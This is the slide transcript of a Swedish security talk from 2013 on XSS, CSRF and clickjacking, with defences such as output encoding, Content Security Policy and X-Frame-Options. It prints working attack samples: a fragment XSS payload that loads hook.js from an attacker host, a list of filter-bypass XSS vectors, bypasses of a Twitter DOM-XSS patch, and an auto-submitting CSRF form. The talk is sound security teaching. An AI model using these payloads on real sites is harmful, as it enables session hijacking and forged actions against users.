tre sårbarheter i webbappar
DESCRIPTION
Presentation of three web application vulnerabilities, in Swedish. Given at GeekMeet Stockhom, January 2013.TRANSCRIPT
![Page 1: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/1.jpg)
Tre sårbarheter i webappar
@johnwilander, GeekMeet 2013
![Page 3: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/3.jpg)
• Cross-Site Scripting (XSS)• Cross-Site Request Forgery (CSRF)• Clickjacking
Tre sårbarheter i webbappar
![Page 4: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/4.jpg)
Över 50 % är XSS
Källa: IBM X-Force 2012 Mid-year Trend and Risk Report September 2012
![Page 5: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/5.jpg)
Cross-Site ScriptingTeori
Cross-Site
Scripting
![Page 6: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/6.jpg)
Cross-Site ScriptingTyp 1, reflekterad
Cross-Site
Scripting
Phishing
![Page 7: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/7.jpg)
Cross-Site ScriptingTyp 2, lagrad
Cross-Site
![Page 8: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/8.jpg)
Cross-Site ScriptingTyp 2, lagrad
Scripting
![Page 9: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/9.jpg)
Cross-Site ScriptingTyp 0, DOM-baserad
Cross-Site
Scripting
Phishing
![Page 10: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/10.jpg)
Cross-Site ScriptingType 0, DOM-baserad
Phising
Cross-Site
Scripting
Inget anrop till servern!
Single-page-appar gör att injicerade skript ”hänger kvar” i DOM:en.
![Page 11: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/11.jpg)
https://secure.example.com/authentication#language=sv&country=SE
![Page 12: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/12.jpg)
https://secure.example.com/authentication#language=sv&country=SE
Skickas aldrig till servern
Var alltid försiktig med att använda data från URL:en, särskilt efter #.
![Page 13: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/13.jpg)
https://secure.example.com/authentication#language=<script src="http://attackr.se:3000/
hook.js"></script>&country=SE
Skulle du klicka på …
![Page 14: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/14.jpg)
https://secure.example.com/authentication#language=%3Cscript%20src%3D%22http%3A%2F%2Fattackr.se%3A3000%2Fhook.js%22%3E%3C
%2Fscript%3E&country=SE
Skulle du klicka på …
![Page 15: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/15.jpg)
http://bit.ly/Yg4T32
Skulle du klicka på …
![Page 16: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/16.jpg)
Filtrera bort <script>?
http://docs.sencha.com/ext-js/4-0/#!/api/Ext.util.Format-method-stripScripts
/** * Strips all script tags * @param {Object} value The text from which to strip script tags * @return {String} The stripped text */stripScripts : function(v) { return !v ? v : String(v).replace(stripScriptsRe, "");},
var ... , stripScriptsRe = /(?:<script.*?>)((\n|\r|.)*?)(?:<\/script>)/ig,
![Page 17: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/17.jpg)
Filtrera bort <script>?<img src=1 onerror=alert(1)>
<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>
<body onload=alert('XSS')>
<table background="javascript:alert('XSS')">
¼script¾alert(¢XSS¢)¼/script¾
<video poster=javascript:alert(1)//
![Page 18: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/18.jpg)
”Kom igen, sånt där funkar inte, va?”
Jo. Demo.
![Page 19: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/19.jpg)
DOM-baserad XSSTwitter september 2010
Källa:http://blog.mindedsecurity.com/2010/09/twitter-domxss-wrong-fix-and-something.html
![Page 20: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/20.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
![Page 21: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/21.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
Vad gör den här koden?
![Page 22: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/22.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returnerar”/johnwilander”
![Page 23: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/23.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returnerar”/johnwilander”
window.location = ”/johnwilander”initialt ’/’ => behåller domänen men ändrar path
![Page 24: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/24.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a; }})(window);
”https://twitter.com/#!/johnwilander”.split(”#!”)[1]returnerar”/johnwilander”
window.location = ”/johnwilander”initialt ’/’ => behåller domänen men ändrar path
Såtwitter.com/#!/johnwilanderblirtwitter.com/johnwilander
Read more: http://kotowicz.net/absolute/
![Page 25: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/25.jpg)
http://twitter.com/#!javascript:alert(document.domain);
![Page 26: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/26.jpg)
http://twitter.com/#!javascript:alert(document.domain);
Skickas aldrig till servern=> DOM-baserad XSS
![Page 27: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/27.jpg)
var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}
The Patch™
![Page 28: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/28.jpg)
var c = location.href.split("#!")[1];if (c) { window.location = c.replace(":", "");} else { return true;}
Ersätter första träffenför sökkriteriet
The Patch™
![Page 29: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/29.jpg)
http://twitter.com/#!javascript::alert(document.domain);
![Page 30: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/30.jpg)
http://twitter.com/#!javascript::alert(document.domain);
![Page 31: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/31.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
The 2nd Patch™
![Page 32: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/32.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window); Regexp-avgränsare
![Page 33: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/33.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
Globalmatchning
Regexp-avgränsare
![Page 34: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/34.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location = a.replace(/:/gi,""); }})(window);
Ignorerastor/litenbokstav
Regexp-avgränsare
Globalmatchning
![Page 35: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/35.jpg)
Fääärdig?
![Page 36: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/36.jpg)
http://twitter.com#!javascript&x58;alert(1)
![Page 37: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/37.jpg)
http://twitter.com#!javascript&x58;alert(1)
HTML entity för ’:’
![Page 38: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/38.jpg)
(function(g){ var a = location.href.split("#!")[1]; if(a) { g.location.pathname = a; }})(window);
The n:th Patch™(den här funkar)
Notera att Twitter faktiskt gör rätt: https://twitter.com/about/security
![Page 39: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/39.jpg)
Lös sådana här problem på rätt sätt med
Client-Side Encoding
![Page 40: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/40.jpg)
https://github.com/chrisisbeef/jquery-encoder•$.encoder.canonicalize()
Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
•$.encoder.encodeForCSS()Encodes for safe usage in style attribute and style()
•$.encoder.encodeForHTML()Encodes for safe usage in innerHTML and html()
•$.encoder.encodeForHTMLAttribute()Encodes for safe usage in HTML attributes
•$.encoder.encodeForJavaScript()Encodes for safe usage in event handlers etc
•$.encoder.encodeForURL()Encodes for safe usage in href etc
![Page 41: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/41.jpg)
https://github.com/chrisisbeef/jquery-encoder•$.encoder.canonicalize()
Throws Error for double encoding or multiple encoding types, otherwise transforms %3CB%3E to <b>
•$.encoder.encodeForCSS()Encodes for safe usage in style attribute and style()
•$.encoder.encodeForHTML()Encodes for safe usage in innerHTML and html()
•$.encoder.encodeForHTMLAttribute()Encodes for safe usage in HTML attributes
•$.encoder.encodeForJavaScript()Encodes for safe usage in event handlers etc
•$.encoder.encodeForURL()Encodes for safe usage in href etc
![Page 43: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/43.jpg)
Skydd mot XSS
Content Security Policyhttp://www.w3.org/TR/CSP/
![Page 44: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/44.jpg)
Tillåt bara skript från godkända domäner
och
tillåt bara skript från filer, dvs inga inline-skript
Ny HTTP svars-header som säger ...
![Page 45: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/45.jpg)
'self' = samma URL, protokoll och port
Content-Security-Policy: default-src 'self'Ladda bara skript, plugins, css, bilder, ljud/video, frames, typsnitt och data från den egna domänen
Content-Security-Policy: default-src 'self'; img-src *; script-src trusted.com Acceptera bilder från valfri domän, skript från trusted.com, resterande bara från den egna domänen
![Page 46: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/46.jpg)
CSRFmin favorit!
![Page 47: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/47.jpg)
Cross-Site Request Forgery
Cross-Site
Request Forgery
![Page 48: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/48.jpg)
Cross-Site Request Forgery
Cross-Site
Request Forgery
Phishing
![Page 49: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/49.jpg)
<img src=”https://secure.example.com/logo.png" />
Får www.attackr.se ladda bilder så här:
?
![Page 50: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/50.jpg)
<img src=”https://secure.example.com/authentication#language=sv&country=SE" />
?
Får www.attackr.se ladda bilder så här:
![Page 51: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/51.jpg)
<img src=”https://secure.example.com/authentication#language=sv&country=SE"
height=0 width=0 />
Med img-element så kan www.attackr.setyst skicka HTTP GET till valfri domän
![Page 52: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/52.jpg)
”Hur är det med HTTP POST då?”
![Page 53: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/53.jpg)
What’s on your mind? What’s on your mind?POST POST
![Page 54: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/54.jpg)
I love OWASP!
What’s on your mind? What’s on your mind?POST POST
![Page 55: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/55.jpg)
I love OWASP!
What’s on your mind? What’s on your mind?POST POST
John: I love OWASP!
![Page 56: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/56.jpg)
What’s on your mind? What’s on your mind?POST POST
![Page 57: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/57.jpg)
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
![Page 58: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/58.jpg)
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
![Page 59: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/59.jpg)
What’s on your mind?I hate OWASP!
What’s on your mind?POST POST
John: I hate OWASP!
![Page 60: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/60.jpg)
What’s on your mind? Look at the lol cat!POST
John: I hate OWASP!
<form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/></form>
<script type="text/javascript"> $(document).ready(function() { $('#form').submit(); });</script>
![Page 61: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/61.jpg)
What’s on your mind? What’s on your mind?POST
John: I hate OWASP!
<form id="target" method="POST" action="https://1-liner.org/form"> <input type="text" value="I hate OWASP!" name="oneLiner"/> <input type="submit" value="POST"/></form>
<script> $(document).ready(function() { $('#target').submit(); });</script>
![Page 62: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/62.jpg)
csrfMulti.html
invisibleiframe
csrfMulti0.html
![Page 63: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/63.jpg)
csrfMulti.html
invisibleiframe
invisibleiframe
target0.html csrfMulti1.html
Wait
![Page 64: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/64.jpg)
csrfMulti.html
invisibleiframe
invisibleiframe
invisibleiframe
target0.html target1.html csrfMulti2.html
Wait
![Page 65: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/65.jpg)
csrfMulti.html
invisibleiframe
invisibleiframe
invisibleiframe
invisibleiframe
target0.html target1.html target2.html csrfMulti3.html
Wait
![Page 66: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/66.jpg)
csrfMulti.html
invisibleiframe
invisibleiframe
invisibleiframe
invisibleiframe
target0.html target1.html target2.html target3.html
![Page 67: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/67.jpg)
Demo POST CSRF mot REST/json
![Page 68: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/68.jpg)
Clickjacking... eller Likejacking eller Followjacking eller ...
![Page 69: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/69.jpg)
Clickjacking-demo
![Page 70: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/70.jpg)
X-Frame-Optionshttp://blogs.msdn.com/b/ie/archive/2009/01/27/ie8-security-part-vii-
clickjacking-defenses.aspxhttp://tools.ietf.org/html/draft-
gondrom-frame-options-01
![Page 71: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/71.jpg)
Ingen sida får ladda mig i en iframe
eller
bara sidor på min egen domän fårladda mig i en iframe
![Page 72: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/72.jpg)
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
(På gång:X-Frame-Options: ALLOW-FROM [list])
![Page 73: Tre sårbarheter i webbappar](https://reader033.vdocuments.mx/reader033/viewer/2022052316/559055631a28ab0d3e8b458c/html5/thumbnails/73.jpg)
Intresserad?
• Gå med i ditt lokala OWASP-chapterhttps://www.owasp.org/index.php/OWASP_Chapter
• Börja följa de här personerna på Twitter:@WisecWisec @0x6D6172696F @garethheyes @securityninja @jeremiahg @kkotowicz @webtonull @manicode @securityshell
• Börja hacka själv – det är kul!Bästa stället att börja? Dina sajter såklart.Håll det lagligt bara ;)